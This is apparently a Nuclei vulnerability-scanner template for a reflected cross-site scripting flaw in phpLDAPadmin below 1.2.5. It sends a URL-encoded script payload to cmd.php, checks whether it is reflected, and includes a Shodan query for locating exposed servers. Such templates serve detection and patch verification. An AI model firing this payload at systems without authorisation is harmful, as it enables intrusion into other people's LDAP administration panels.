id: phpldapadmin-xss

info:
  name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting
  author: GodfatherOrwa,herry
  severity: medium
  description: PHP LDAP Admin is vulnerable to XSS.
  reference:
    - https://twitter.com/GodfatherOrwa/status/1701392754251563477
  classification:
    cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 9
    vendor: phpldapadmin_project
    product: phpldapadmin
    shodan-query: html:"phpLDAPadmin"
  tags: php,phpldapadmin,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1"
      - "{{BaseURL}}{{path}}/index.php?redirect=true&meth=ajax"

    attack: pitchfork
    payloads:
      path:
        - /
        - /htdocs/index.php
        - /phpldapadmin

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "No such entry"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100eb01d695e83e9dcb36c7a5fbdf057dd7a2ba2de1911c6c22bd6a9feebb5d6f36022100d50824045fd8054212489198abf41b54394149b72d7eb5c4320bc34b2bb96993:922c64590222798bb761d5b6d8e72950